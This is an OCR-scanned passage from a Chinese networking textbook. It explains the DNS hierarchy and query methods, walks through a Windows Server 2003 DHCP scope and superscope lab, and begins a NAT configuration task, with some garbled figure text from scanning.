名 变换 为 IP 地 址 , 比 NetBIOS 命名 体系 更 科学 ,扩展 性 强 , 适 用 于 各 种 规模 网 络 。Internet 
就 是 基于 域名 体系 查找 定位 广域网 中 的 服务 器 。 


7.3.1 域名 系统 层次 结构 


域名 系统 使 用 树 形 目录 结构 ,目录 最 顶层 被 称 为 根 。 如 图 7-37 所 示 , DNS 最 顶层 是 
DNS 根 域 ,用 “. "表示 。 目 前 ,全 世界 共有 13 台 根 域名 服务 器 ,分 布 于 世界 各 大 洲 。 

从 根 目录 衍生 的 分 支 有 两 种 ,一 类 是 通用 顶层 域名 , 另 一 类 是 国家 顶层 域名 。 通 用 顶层 
域名 根据 1994 年 公布 的 RFC1591 规定 ,com 代表 公司 企业 ,net 代表 网 络 服务 机 构 ,org 代 
表 非 营利 性 组 织 等 ; 国家 或 地 区 顶层 域名 由 ISO3166 定义 ,cn 代表 中 国 ,us 代表 美国 ,详细 
可 见 表 7-1。 


@ NetBIOS 使 用 16 个 字符 的 名 称 来 标识 每 个 网 络 资源 ,前 15 个 字符 由 用 户 指定 (一 般 为 计算 机 主机 名 ,在 “我 的 
电脑 一 属性 一 计算 机 名 "中 配置 ) ,第 16 个 字符 代表 资源 类 型 。 在 网 上 邻居 中 看 到 的 “计算 机 名 ”和 “工作 组 名 "就 是 
NetBIOS 名 称 。 
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,com net ,Org .edu jp 


:pconline 极 域 
-WWW 主机 名 
WWW 
图 7-37 域名 系统 的 层次 结构 
表 7-1 顶层 域名 
通用 顶层 域名 国家 或 地 区 顶层 域名 
com 商业 机 构 cn 中 国 
edu 教育 组 织 hk 中 国 香港 
net 网 络 服务 机 构 tw 中 国 台 湾 
mil 军事 机 构 jp 日 本 
gov 政府 机 构 us 美国 
org 非 营利 性 组 织 uk 英国 


除了 根 域 和 顶层 域 之 外 ,其 他 域 被 称 为 子 域 。 一 个 子 域 可 以 衍生 出 下 一 个 子 域 ,之 间 用 
“.” 隔 开 , 子 承 关 系 从 右 到 左 逐 级 展开 。 例 如 域名 pconline， com. cn”,“cn” 是 国家 顶层 域 
名 ,“com. cn” 是 其 一 个 子 域 ,也 称 为 二 级 域 ;“pconline. com” 属 于 . com 子 域 ,是 三 级 域 。 

域名 体系 最 底层 是 处 于 域 中 的 主机 名 称 。 一 个 域 可 由 多 个 服务 器 组 成 各 司 其 职 , 名 称 
为 WWW 的 主机 提供 Web 服务 ,名 称 为 Mail 的 主机 提供 邮件 服务 ,名 称 为 FTP 的 主机 提 
供 文件 传输 服务 等 。 虽 然 域 中 主机 名 称 可 以 自 定 义 , 但 最 好 要 符合 约定 规则 ,否则 随意 命名 
会 给 客户 访问 域 中 主机 带 来 不 便 2。 一 个 完整 合格 域名 代表 网 络 中 唯一 主机 ,访问 域名 为 
“www. pconline. com. cn” 的 主机 实际 上 就 是 找到 pconline. com. cn 域 中 主机 名 为 ”www” 的 
主机 。 


7.3.2 DNS 地 址 解析 过 程 


DNS 域名 系统 采用 客户 端 /服务 器 模式 。 每 个 DNS 服务 器 存放 部 分 DNS 名 称 与 IP 
地 址 映射 记录 ,服务 器 之 间 也 可 以 相互 查询 。 当 收 到 客户 端 域名 解析 请 求 时 ,DNS 服务 器 
首先 会 在 本 地 数据 库 中 查找 相应 记录 , 若 找到 相应 IP 地 址 信息 , 则 立刻 响应 客户 浏览 器 ; 


@@ ”例如 域 中 提供 Web 服务 主机 命名 为 aaa* 那 么 客户 端 浏览 器 必须 输入 aaa. pconline. com. cn 才 可 以 访问 。 
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如 果 没 有 该 记录 , 则 DNS 服务 器 再 向 其 他 服务 器 转交 查询 信息 ,完成 客户 端 请 求 。 在 DNS 
中 ,服务 器 有 两 种 查询 方式 ,分 别 是 迭代 查询 和 递归 查询 。 

1. 迭代 查询 

当 DNS 服务 器 接收 到 客户 端 域名 解析 请 求 时 ,首先 在 本 地 高 速 缓存 和 数据 库 中 查找 相 
应 记录 ,如 果 查 找到 该 记录 则 响应 客户 端 请 求 ; 若 找 不 到 则 返回 客户 端 指针 ,用 于 指向 域 系 
统 中 上 一 级 DNS 服务 器 。 例 如 ,学校 DNS 服务 器 向 学 生 客户 机 提供 域名 解析 服务 , 若 找 不 
到 相应 记录 , 则 告诉 客户 端 向 上 一 级 (如 中 国电 信 DNS 服务 器 ) 域 名 服务 器 查询 。 在 学 生 客 
户 端 收 到 后 向 指定 DNS 服务 器 发 出 解析 请 求 ,上 一 级 DNS 服务 器 如 此 重复 查询 过 程 ,直到 
找到 该 记录 或 超时 为 止 。 整 个 查询 过 程 称 为 迭代 查询 ,每 迭代 一 次 ,指针 都 会 指向 更 上 一 
级 ,更 靠近 DNS 根 服务 器 ,迭代 查询 过 程 如 图 7-38 所 示 。 


器 3 
DNS 服务 器 : 


学 生 客户 庙 应 答 
图 7-38 迭代 查询 过 程 


2. 递归 查询 

当 客户 端 向 DNS 服务 器 发 出 解析 请 求 后 ,DNS 服务 器 承担 此 后 全 部 查询 工作 。 服 务 
器 在 本 地 数据 库 中 查找 相应 记录 返回 给 客户 端 。 若 找 不 到 , 则 服务 器 会 蔡 代 客户 端 直 接 向 
根 DNS 服务 器 发 出 查询 请 求 ,在 根 服务 器 及 其 子 域 指引 下 一 级 一 级 向 下 递归 查询 ,最 后 把 
结果 返回 给 客户 端 。 例 如 学 生 客户 端 向 学 校 DNS 服务 器 发 出 查询 请 求 ,要 求解 析 域 名 网 易 
www. 163. com 的 IP 地 址 ,执行 步骤 如 下 。 

(1) 学 生 客户 端 向 学 校 DNS 服务 器 发 出 查询 请 求 ,要 求解 域名 www. 163. com 的 IP 
地 址 。 

(2) 当 学 校 DNS 服务 器 收 到 请 求 后 ,首先 在 本 地 缓存 或 数据 库 中 查询 。 如 果 找 到 匹配 
记录 , 则 返回 给 客户 端 ; 若 找 不 到 , 则 替 客 户 端 向 根 域 服 务 器 转发 查询 请 求 。 

(3) 根 DNS 服务 器 部 署 在 世界 各 大 洲 , 由 美国 网 络 信息 中 心 授权 管理 。 根 DNS 服务 
器 不 会 存放 具体 域名 记录 ,但 com 属 其 子 域 , 它 会 告诉 学 校 DNS 服务 器 应 向 其 com 子 域 
(通用 顶层 域名 ) 查 询 。 因 此 , 根 域名 服务 器 返回 指针 ,指向 下 一 级 com 子 域 权威 的 DNS 服务 器 。 

(4) 当 学 校 DNS 服务 器 接收 到 指针 后 ,转向 com 子 域 查 询 。com 子 域 DMS 服务 器 同 
样 不 会 存放 具体 记录 ,但 会 指引 学 校服 务 器 向 其 下 一 级 163. con 子 域 进 行 查询 。 

(5) 当 学 校 DNS 服务 器 接收 指针 后 ,再 转向 163. com 子 域 DNS 服务 器 查询 。 由 于 提 
供 Web 服务 的 www. 163. com 主机 需要 向 163. com 二 级 域 注册 “www” 主 机 名 ,因此 在 
163. com 域 中 肯定 能 找到 匹配 记录 。163. com 子 域 DNS 服务 器 将 查询 结果 返回 学 校 DNS 
服务 器 ,学 校 DNS 服务 器 缓存 此 记录 并 响应 学 生 客户 端 浏览 器 ,具体 流程 如 图 7-39 所 示 。 
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向 DNS 提出 请 求 向 根 域 发 出 请 求 


客户 端 DNS 服务 器 | 
学 生 客户 


上 
学 生 客户 端 ”返回 结果 


指向 com 子 域 | 
根 域 DNS 


返回 结果 -com 权威 DNS 


163.com 权 威 DNS 


图 7-39 递归 查询 过 程 


7.4 DHCP 服务 


工作 任务 十 一 ”配置 DHCP 服务 


工作 目的 

安装 和 配置 DHCP 服务 。 

工作 任务 

小 张 是 学 校 网 管 中 心 人 员 。A 栋 宿 舍 IP 段 为 192. 168. 1. 0( 其 中 192. 168. 1. 1 一 192. 
168. 1. 10 是 保留 网 段 用 于 分 配给 网 络 设备 和 服务 器 ) 。 随 着 宿舍 主机 数量 增加 , 源 IP 段 已 
经 不 能 满足 需求 ,不 对 现 有 网 络 规划 做 较 大 改动 ,小 张 打 算 新 增 一 个 172. 16. 1. 0 地 址 段 用 
于 给 A 栋 主 机 动态 分 配 IP ,并 实现 192. 168. 1.0 与 172. 16.1.0 段 主机 的 互通 。 

工作 环境 和 工具 

工作 任务 十 一 的 工作 环境 拓扑 图 如 图 7-40 所 示 , 工 具 和 录像 可 在 http://www.gdcp. 
cn/jpkc/lf 中 下 载 。 

DHCP 动态 主机 配置 协议 是 动态 分 配 和 管理 IP 地 址 的 协议 。 当 客户 端 IP 设置 为 自动 
获取 时 ,会 主动 向 DHCP 服务 器 广播 请 求 为 其 分 配 IP 地 址 、 子 网 掩 码 、 网 关 和 DNS 服务 器 
相关 网 络 参数 ,以 实现 IP 地 址 的 动态 分 配 。 

工作 过 程 

1. 在 主机 2 配置 多 个 IP 地 址 

启动 主机 2 进入 *TCP/IP 属性 ”配置 对 话 框 , 单 击 “ 高 级 ”按钮 ,在 弹出 的 对 话 框 中 单 击 
“添加 ”按钮 并 输入 第 一 个 IP*192. 168. 1. 1” 与 子 网 掩 码 “255. 255. 255. 0”, 按 同样 方法 继续 
添加 第 二 个 IP 地 址 “172. 16. 1. 1 和 子 网 掩 码 “255. 255. 255. 0”, 如 图 7-41 所 示 。 
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交换 机 


主机 1 客户 机 

IP : 192.168.1.254( 自 动 获取 ) S 
Mask : 255.255.255.0( 自 动 获取 ) 

网 关 : 255.168.1.1( 自 动 获 取 ) 主机 2 ee 


IP: 192.168.1.1 


Mask : 255.255.255.0 


主机 3 客户 机 

IP : 172.168.1.10( 自 动 获取 ) 
Mask : 255.255.255.0( 自 动 获取 ) 
网 关 : 172.16.1.1( 自 动 获 取 ) 


IP2: 172.16.1.1 
Mask : 255.255.255.0 
| 主机 名 称 | 担任 角色 操作 系统 IP 地 址 地 址 池 
主机 1 客户 机 。 |Windows XP 自动 获取 


-|DHCP 服 务 器 |、 192.168.1.1 |{193.168.1.10~192.168.1.254} 
主机 2 | 路由器” |Windows Server 2003 | 172.16.1.1 |{172.16.1.10~172.16.1.254} 
| 主机 3 | 客户 机 |windows XP 自动 获取 


7-40 工作 任务 十 一 的 工作 环境 拓扑 图 


高 级 TCF/IE 设置 


芋 设 置 |oms | ms | 选项 | 
[ 联 地 址 加 ) 


TO 了 o 


王 地 址 0D): 1 
子 网 捷 码 G): [255 .255 .255 . 0 


Cw ] ww | 


[所 自动 路 点 计数 如 


按 D 史 #0; 站 


图 7-41 
2. 在 主机 2 安装 DHCP 服务 


Windows 2003 系统 默认 不 安装 DHCP 服务 。 启 动 主机 2 进入 Windows 组 件 向 导 , 在 
“网 络 服务 ”对话 框 中 单 击 “详细 信息 ”按钮 ,并 在 组 件 列表 中 选中 “动态 主 机 配置 协议 


(DHCP)” 选 项 ,如 图 7-42 所 示 ,根据 向 导 完 成 安装 。 
3. 在 主机 2 新 建 作 用 域 


(1) 启动 DHCP 服务 ,选择 开始 ”~ 所 有 程序 ”管理 工具 ”~DHCP" 命 令 ,在 打开 
的 窗口 中 右 击 “ 主 机 2” 选 项 ,在 弹出 的 快捷 菜单 中 选择 “新 建 作 用 域 " 命 令 , 如 图 7-43 所 示 ， 


进入 “新 建 作用 域 向 导 ” 界 面 。 
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局 
ee 


加 轴 域 名 系统 ms) .| 
撕 述 ; 多. THCP 服务 器 为 同一 个 网 入 上 的 客户 满 计算 机 自动 分 包 格 时 的 I 


所 希 磁 盘 空间 : 3.4 上 = 
本 pe 许 细 信息 加 
my | 


图 7-42 安装 DHCP 服务 


文件 四 操作) 查看 WW 必 助 人 0 
和 之 | 白 加 | 闪 呈 四 | 多 四 | 乌 
P 


让 机 2 T192 168 1 11 


KH 和 IP 地 址 范围 。 您 必须 


ee 请 在 “ 指 作 ” 菜单 下 单 击 “新 建 作用 域 " 


图 7-43 ”新建 DHCP 作用 域 


(2) 填写 作用 域名 称 和 描述 以 便 日 后 识别 和 管理 ,如 名 称 为 “作用 域 1” ,描述 是 “192. 
168. 1.0” 网 段 , 单 击 “ 下 一 步 ” 按 钮 进入 “IP 地 址 范围 ?配置 界面 。 

(3) 配置 地 址 池 起 始 地 址 "192. 168. 1. 10” 和 结束 地 址 “192. 168. 1. 254”, 子 网 掩 码 长 度 
用 默认 24 位 , 即 “255. 255. 255. 0”, 如 图 7-44 所 示 。 

(4) 跳 过 "添加 排除 地 址 段 ? 配 置 界 面 , 单 击 * 下 一 步 ? 按 钮 进入 "租约 期 限 * 配 置 界 面 , 默 
认为 8 天 。 租 约 期 限 过 短 会 增加 客户 端 续 约 次 数 ,影响 网 络 流量 ; 过 长 会 导致 DHCP 服务 
器 不 能 及 时 回收 IP 造成 浪费 。 一 般 给 拨号 上 网 的 用 户 分 配 的 期 约 时 间 较 短 ,固定 网 络 期 约 
时 间 应 较 长 比较 好 。 

(5) 单 击 “下 一 步 按 钮 进入 "路 由 器 (默认 网 关 ) ”配置 界面 ,给 客户 端 添 加 默认 网 关 信 
息 , 即 主机 2 本 地 IP 为 “192. 168. 1. 1", 如 图 7-45 所 示 。 

(6) 跳 过 “域名 DNS 服务 器 "和 “WINS 服务 器 "IP 配置 ,激活 作用 域 。 按 上 述 步 又 继 
续 添 加 “DHCP 作用 域 2” 选 项 ,地 址 池 起 始 IP 为 “172. 16. 1. 10”, 结束 IP 为 “172. 16. 1. 
254”, 子 网 掩 码 长 度 改 用 24 位 即 “255. 255. 255. 0”, 客 户 端 默认 网 关 IP 为 主机 2 本 地 IP 
“172. 16. 1. 1” ,创建 完成 后 如 图 7-46 所 示 。 
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新 建 作用 域 向 导 


IP 地 址 范围 
您 通过 确定 一 组 连续 的 IF 地 址 来 定义 作用 域 地 址 范围 


输入 此 作用 域 分 配 的 地 址 范围 


下 娩 示 地 直 Gi |192.168. 1 . 10 
兰 束 下 地 址 芭 5 |132.168. 1 .254 


ET 


长 度 员 ): EE 习 
子 网 掩 码 ED 


《< 上 一 步 四 ) 取消 


图 7-44 配置 IP 地 址 范围 


新 建 作用 域 向 导 


路 由 器 莱 认 网 关 ) 
您 可 为 指定 此 作用 域 要 分 配 的 路 由 器 或 默认 网 关 。 


要 添加 客户 端 使 用 的 路 由 器 的 IP 地 址 ， 请 在 下 面 输 入 地 址 。 


加 
于 移 厅 | 


《上 =- 步 @[ 下 -上 四 让 取消 | 


图 7-45 配置 客户 端 默认 网 关 


文件 四 ”操作 查看 WW 帮助 0) 
中 小 | 和 由 | 加 |X 和 昌 有 | 岛国 | 昌 鱼 


DHCP 


主机 2 [192. 168.1.1] 
Ol Et2 [192 158 1 1 ] 
日 国 作用 域 [172. 18.1.0] 作用 域 2 


作用 域 [172 16.1.0] 作用 域 2 ” 林 活动 林 
国 作 用 域 [192. 168.1.0] 作用 域 ! ** 活动 + 


| 国 服 务 器 选项 


白 夺 保留 


.合作 用 域 选项 
日 图 作用 域 [192. 168. 1.0] 作用 域 1 


-二 地 址 租约 
{ 避 保 久 
号 作用 域 先 项 
国 服务 器 选项 


| [ i 
图 7-46 作用 域 1 和 作用 域 2 
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4. 在 主机 2 新建 超级 作用 域 


(1) 右 击 “ 主 机 2” 选 项 ,在 弹出 的 快捷 菜单 中 选择 “新 建 超级 作用 域 " 命 令 , 如 图 7-47 所 


示 , 进 入 “新 建 超级 作用 域 向 导 ” 界 面 。 


=/9|x| 
文件 四 ”操作 多 ”查看 WW 帮助 四 


日 向 作用 域 [192. 168， 
人 轩 地 址 池 ee 
全 地 址 租约 一 


便 保 久 协调 所 有 作用 域 ). 
全 作用 域 选项 
全 服务 器 选项 定义 用 户 类 别 0 . 
定义 供应 商 类 别 C) 


图 7-47 新 建 超级 作用 域 


(2) 输入 超级 作用 域名 称 如 “A 栋 宿 舍 IP”, 单 击 “ 下 一 步 ?按钮 ,选中 超级 作用 域 包含 的 
区 域名 称 ,分别 是 “作用 域 1 ”和 “作用 域 2”, 如 图 7-48 所 示 。 


选择 作用 域 
您 通过 汗 立 一 个 作用 域 集合 来 包 当 一 个 超级 作用 域 ， 


从 列表 中 迁 反 一 个 或 多 个 作用 域 梅 其 添加 到 超级 作用 域 中 。 
可 用 作用 域 D; 


《< 上 - 步 吕 [一 步 加 > 取 滑 


图 7-48 选择 作用 域 
(3) 新 建 超级 作用 域 后 如 图 7-49 所 示 。 
和 二 可 
文件 操作 凶 ) 查看 W)。 帮助 四 
中 消 | 旬 | 加 |X 狠 卓 胞 | 岛国 | 昌 @ 
[ww CT 


国 作用 域 [172. 16.1.0] 作用 域 2 ” 林 活动 林 


四 国 作用 域 [192 168.1.0] 全 国 作 用 域 [192. 168.1.0] 作用 域 1 ” 昱 活动 * 


国 服务 器 寺 项 
图 7-49 查看 超级 作用 域 
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5. 在 主机 2 启用 LAN 路 由 


(1) 为 使 A 栋 宿舍 “192. 168. 1. 0 网 段 与 “172. 16. 1.0” 网 段 主 机 能 够 相互 通信 ,还 需 启动 
主机 2 的 LAN 路 由 。 选 择 “ 开 始 ”>“ 管 理工 具 ”>“ 路 由 和 远程 访问 "命令 ,在 打开 的 窗口 中 右 
击 “ 主 机 2” 选 项 ,在 弹出 的 快捷 菜单 中 选择 “配置 并 启用 路 由 和 远程 访问 ”命令 ,如 图 7-50 所 示 。 


路 由 和 运程 访问 
文件 到 ) 拘 作 避 ) 查看 WD 帮助 0 
和 后 才 | 扣 | 困 | X 晕 日 | 国力 


主机 12 (本 地 ) 


和 器 的 配置 
6 加， 区 “操作 " 床单 上 单 击 “ 配 
访问 ”。 


是 访问 ， 部 署 方案 ， 以 及 疑难 解答 
帮助 。 


图 7-50 配置 并 启用 路 由 


(2) 启用 主机 2 的 LAN 路 由 。 在 安装 向 导 单 击 “ 自 定义 配置 ”按钮 ,再 单 击 “ 下 一 步 ” 按 


钮 ,然后 选择 “LAN 路 由 ”选项 ,完成 后 开启 路 由 服务 。 
6. 实验 测试 


(1) 在 主机 2 作用 域 1 地 址 池 中 新 建 排除 网 段 *192. 168. 1. 10 一 192. 168. 1. 253”, 用 于 
模拟 A 栋 宿 舍 “192. 168. 1.0” 网 段 地 址 池 即 将 用 尽 的 情况 。 进 入 作用 域 1 右 击 "地址 池 ” 选 


项 ,在 弹出 的 快捷 菜单 中 选择 “新 建 排除 范围 ”命令 ,如 图 7-51 所 示 。 


文件 下 换 作 心 ) 查看 0D 帮助 QD 
和 小 | 知 | 四 | 日 区 | 名 团 | 米 
DHCF 
日 区 主机 2 [192.168.1.1] 
日 和 超级 作用 域 A 株 宿 全 IF 
日 个 作用 域 [172. 16.1.0] 作用 域 2 
园地 址 池 
Ea 


7-51 新 建 排除 网 段 


(2) 在 “添加 排除 ?对 话 框 中 新 建 排除 段 IP 地 址 段 *192. 168. 1. 10 一 192. 168. 1. 253”， 


此 时 地 址 池 可 供 分 配 的 IP 只 剩 “192. 168. 1. 254”, 如 图 7-52 所 示 。 
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Xx| 
文件 四 ”名作 册 查看 下 助 吕 
| 加 | 日 区 | 岛国 | 类 
-BE Lez.168.1.1 [无 洁 本 地 二 ”| 怒 京 节 地 址 | 
日- 图 超级 作用 域 \ 栋 宿舍 I 2 


192. 168. 1.254 


昌国 作用 域 [172. 16. 1.0] 作用 域 2 
位 地 址 池 
[ {好 地 址 租约 
“9 TE 1 


oe 


生地 址 池 
友 地 址 租 
全 保 久 起 嫩 还 地 直 G) |192.166. 1 .10 
着 作 月 

名 服务 回迁 项 | “结束 到 地 址 @ |hs2 168 1 .253 


zn0 | 


7-52 添加 排除 网 段 


(3) 先后 启动 主机 1 和 主机 3, 将 IP 地 址 设置 为 自动 获取 ,通过 “ipconfig /all” 命 令 查 
看 两 台 主 机 的 IP 和 DHCP 服务 器 地 址 ,如 图 7-53 所 示 。 


i 
近 沙 二 引 srra 
eu 


1 日 19:49:24 


图 7-53 主机 1 和 主机 3 获得 的 IP 地 址 


(4) 在 主机 1 通过 ping 命令 测试 与 主机 3 能 否 正常 通信 ,如 图 7-54 所 示 。 从 图 7-54 
中 可 以 看 到 TTL 值 从 默认 128 减 为 127 ,表明 经 过 1 个 路 由 器 转发 。 


Microsoft Windows XP [版 本 5.1.2688] < 
《c》 版 权 所 有 1985-2881 Microsoft Corp- 
jc: Documents and Settings hdninistrator>ping 172.16.1.18 


Pinging 172.16.1.18 with 32 bytes of data: 


ly _ from 172.16.1.19: bytes=32 tineCims ITIL=127 

ply fron 172.16.1.10: hytes=32 tine=2ns TIL=127 
IReply from 172.16-1-19: bytes=32 tine<inms IIL=127 
Reply from 172.16-1-18: bytes=32 time<lms TIL=127 


Ping statistics for 172.16.1.18: 

Packets: Sent = 4. Received = 4. Lost = @ (8x loss). 
Approxinate round trip tines in nilli-seconds: 

Mininun = @ns, Maxinun = 2ns, fverage = gns 


图 7-54 两 主机 连通 性 测试 
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任 甸 总 结 庄 


(1) 车 网 络 中 DHCP 服务 器 故障 或 无 法 与 DHCP 服务 器 通信 ,客户 机 将 从 自动 专用 地 
址 段 “169. 254. 0. 1 一 169. 254. 255. 254” 随 机 选择 一 个 IP 地 址 作为 自身 地 址 ,并 每 隔 5min 
广播 一 次 请 求 信息 ,直到 从 DHCP 服务 器 获取 到 正确 IP 为 止 。 

(2) 两 个 网 段 不 同 的 计算 机 即使 接 和 人 同一 个 交换 机 仍 不 能 ping 通 , 因 为 它们 网 络 号 不 
同 ,逻辑 上 仍 不 属于 同一 局 域 网 。 

(3) DHCP 动态 分 配 IP 的 对 象 仅 限 客 户 机 ,服务 器 网 络 设备 由 于 对 外 要 提供 服务 ,IP 
地 址 不 能 随意 变更 ,只 能 通过 静态 配置 。 

(4) 当 客 户 机 采取 自动 获取 IP 时 ,系统 每 次 启动 获取 到 的 IP 一 般 是 不 同 的 ,虽然 使 用 
方便 ,但 会 带 来 系统 启动 延迟 ,建议 网 络 主机 数量 很 少时 仍 使 用 静态 分 配 。 

让 知识 拓展 

配置 IP 有 两 种 方法 : 第 一 种 是 静态 输入 IP 地 址 ,给 主机 配置 一 个 固定 IP, 即 在 静态 分 
配 下 网 络 管理 员 需 记录 哪些 IP 地 址 已 被 分 配 、 哪 些 地 址 可 供 使 用 .客户 端 必须 手动 输入 IP 
地 址 等 信息 ,这 会 给 管理 员 和 客户 双 发 带 来 不 便 ; 第 二 种 方法 是 通过 DHCP 协议 动态 获取 
IP, 由 DHCP 服务 器 将 地 址 池 中 可 供 使 用 的 IP 信息 动态 分 配给 客户 端 ,从 而 减轻 网 络 规 
划 、 管 理 和 维护 给 管理 员 带 来 的 负担 ,即使 网 络 拓扑 发 生变 化 ,客户 机 也 能 获取 到 合适 的 
IP, 并 且 可 以 避免 因 静 态 分配 带 来 的 冲突 问题 。 

DHCP(Dynamic Host Configure Protocol) 动 态 主 机 配置 协议 由 IETF(Internet 工程 
任务 小 组 ) 设 计 开 发 ,用 于 为 网 络 中 的 主机 自动 分 配 TCP/IP 参数 的 协议 。DHCP 采用 客户 
端 /服务 器 模式 ,客户 端 在 初始 化 网 络 配置 时 向 所 处 网 络 广播 TCP/IP 参数 请 求 ,DHCP 服 
务 器 收 到 后 根据 网 络 环境 自动 为 客户 端 分 配合 适 的 IP 地 址 信息 ,包括 子 网 掩 码 ,默认 网 关 
和 DNS 服务 器 等 TCP/IP 参数 。 


7.4.1 DHCP 协议 地 址 分 配方 式 


DHCP 协议 中 IP 地 址 分 配 有 两 种 方式 ,分 别 是 自动 分 配 和 动态 分 配 。 

(1) 自动 分 配 。 当 DHCP 服务 器 使 用 自动 分 配方 式 时 ,在 客户 端 第 一 次 从 DHCP 服务 
器 成 功 租 用 IP 地 址 后 ,可 以 永远 使 用 该 地 址 。 

(2) 动态 分 配 。 当 使 用 动态 分 配方 式 时 ,在 客户 端 第 一 次 从 HDCP 服务 器 租用 人 P 地 址 
后 ,并 不 能 无 限期 使 用 下 去 ,一 旦 租约 到 期 ,客户 端 必须 释放 该 IP 并 重新 申请 新 地 址 或 续 租 。 


7.4.2 DHCP 服务 工作 原理 


当 客 户 端 IP 设 为 自动 获取 方式 时 ,主机 启动 后 将 通过 以 下 步骤 获得 TCP/IP 参数 。 

(1) 客户 端 启动 后 登录 网 路 ,系统 发 现 TCP/IP 协议 没有 任何 配置 参数 ,将 向 网 络 发 出 
一 个 DHCPDISCOVER 封包 。 封 包 源 地 址 为 “0. 0. 0.0”, 目 的 地 址 为 “255. 255. 255. 255”, 向 所 
处 网 络 广播 DHCPDISCOVER 封包 。 

(2) DHCP 服务 器 在 监听 到 客户 端 发 出 的 DHCPDISCOVER 广播 后 ,服务 器 从 尚未 出 
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租 的 地 址 池 中 选择 最 小 IP 连同 其 他 参数 通过 DHCPOFFER 封包 返回 给 客户 端 。 
DHCPOFFER 封包 源 地 址 为 DHCP 服务 器 本 地 IP, 目 的 地 址 为 “255. 255. 255. 255”( 客 户 
端 此 时 还 没有 IP) ,封包 包含 IP 地 址 、 子 网 掩 码 、 网 关 、DNS 和 租约 时 间 等 信息 。 

当 客 户 端 发 送 第 一 个 DHCPDISCOVER 信息 后 ， 若 在 1s 内 未 收 到 DHCP 服务 器 返回 的 
DHCPOFFER 应 答 包 ,客户 机 会 分 别 以 2s、4s、8s、16s 时 间 间 隔 重 新 广播 4 次 DHCPDISCOVER 
封包 。 若 仍 未 收 到 服务 器 应 答 , 则 此 时 根据 客户 机 不 同系 统 会 出 现 以 下 3 种 情况 。 

Q@ Windows 2000 系统 客户 端 会 从 *169. 254. 0. 1 一 169. 254. 255. 254” 自 动 专用 地 址 段 
随机 选择 一 个 IP 作为 暂 用 IP, 用 于 与 其 他 IP 获取 失败 的 客户 机 进行 临时 通信 。 

@ Windows XP 和 Windows 2003 系统 客户 机 会 采用 备用 IP 配置 进行 通信 , 若 事先 没 
有 配置 备用 IP, 则 将 采用 自动 专用 IP 段 ,这 与 Windows 2000 系统 一 样 。 

@ Linux 操作 系统 客户 端 IP 仍 为 0.0.0.0, 无 法 正常 进行 网 络 通 信 。 

(3) 如 果 网 络 中 存在 多 个 DHCP 服务 器 ,那么 客户 端 发 送 DHCPDISCOVER 封包 后 会 
收 到 多 个 服务 器 响应 ,而 客户 端 只 会 采用 最 先 接收 到 DHCPOFFER 封包 中 提供 的 IP 地 
址 ,并 向 网 络 广播 DHCPREUEST 封包 告知 自己 所 接收 的 IP 和 选择 的 DHCP 服务 器 。 

(4) 网 络 中 的 多 台 DHCP 服务 器 都 会 收 到 客户 端 发 出 的 DHCPREQUEST 封包 ,在 未 
被 采用 的 DHCP 服务 器 回收 前 分 配给 客户 端的 IP, 而 被 采用 的 DHCP 服务 器 会 广播 
DHCPACK 封包 ,向 客户 端 确认 IP 租约 正式 生效 ,结束 DHCP 分 配 过 程 ,如 图 7-55 所 示 。 


DHCP Server 


省 时 旦 时 晤 


到 
4 3. DHCPREQUEST 


4. DHCPACK 
图 7-55 ”DHCP 分配 过 程 


7.4.3 客户 端 租约 更 新 


客户 端 获得 IP 租约 后 必须 定期 更 新 租约 ,否则 期 约 满 后 将 不 能 继续 使 用 该 IP 地 址 。 
每 当 到 租约 时 间 的 50% 到 87. 5% 时 ,客户 端 必须 向 DHCP 服务 器 发 送 DHCPREQUEST 
封包 请 求 更 新 租约 。 

(1) 当 到 租约 时 间 的 50% 时 ,客户 端 以 单 播 方 式 向 DHCP 服务 器 发 送 
DHCPREQUEST 请 求 更 新 租约 。 如 果 客 户 端 收 到 服务 器 返回 的 应 答 , 则 根据 应 答 信息 提 
供 的 新 租 期 以 及 配置 信息 更 新 TCP/IP 参数 ,完成 IP 租用 更 新 ; 如 果 没 有 收 到 服务 器 响 
应 , 则 客户 端 继续 使 用 现 有 IP 地 址 。 

(2) 当 到 租约 时 间 的 87. 5% 时 仍 未 更 新 租约 ,客户 端 再 次 发 送 DHCPREQUEST 请 求 
更 新 租约 ,如 仍 未 收 到 服务 器 响应 , 则 客户 端 还 可 继续 使 用 现 有 IP 地 址 。 

(3) 如 果 租 约 到 期 仍 未 收 到 DHCP 服务 器 应 答 , 则 客户 端 不 能 续 约 ,将 以 广播 方式 发 
送 DHCPDISCOVER 封包 ,重新 获取 IP 地 址 。 
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(4) 如 果 客 户 端 在 租约 时 间 内 重新 启动 系统 , 则 不 能 续 约 ,客户 端 将 以 广播 方式 发 送 
DHCPDISCOVER 封包 ,重新 获取 IP 地 址 。 


7.5 NAT 服务 


工作 任务 十 二 ”配置 NAT 服务 

工作 目的 

安装 和 配置 NAT 服务 。 

工作 任务 

小 张 是 学 校 网 管 中 心 人 员 , 需 配 置 学 校 NAT 服务 器 以 实现 以 下 要 求 。 

(1) 主机 2 配置 图 书馆 Web 站 点 ,主机 3 配置 学 校 Web 站 点 ,主机 4 配置 Baidu 站 点 。 

(2) 主机 3 配置 DNS 服务 ,让 主机 1 通过 域名 “www. liB. gdcp. en” 访问 主机 2, 通 过 域 
名 “www. gdcp. cn” 访 问 主机 3, 通 过 域名 “www. baidu. com” 访 问 主机 4。 

(3) 主机 3 配置 NAT 服务 ,让 A 栋 宿舍 主机 1 通过 公共 IP*202. 116. 64. 100” 接 入 外 
网 ,并 能 访问 主机 4 的 Web 站 点 。 

工作 环境 和 工具 

主机 3 内 置 两 个 网 卡 ,其 中 *3-4? 网 卡通 过 交叉 线 与 主机 4 网 卡 直接 连接 ,模拟 广域网 拓 
扑 , 具 体 工 作 环境 拓扑 图 如 图 7-56 所 示 , 工 具 和 录像 可 在 http://www. gdcp. cn/jpkc/lf 中 下 载 。 


2 ~ 


了 、 
Pe IP: 192.168.1.10 、\、 
/Chient Mask: 255.255.255. 人 
Gateway: 192.168.1. LN 
了 DNS: 192.168.1.1 


专用 接口 


1 
4 
1 
交换 机 
| 
4 


1 
| NAT 服 务 器 baidu Server 
| DNS 服 务 器 域名 : www.baidu.com 
ee 学 校 Web 服 务 器 
\ 图 书信 Web 服 务 器 / 域名 : wwwgdepen Misky 5239.355335 0 
\ ee ee /1 3- 交换 机 网 卡 1 3-4 网 卡 Gateway: 202.116.64.100 
并 Ma k 255 255.255.0 / IP: 192.168.1.1 1 IP: 202.116.64.100 
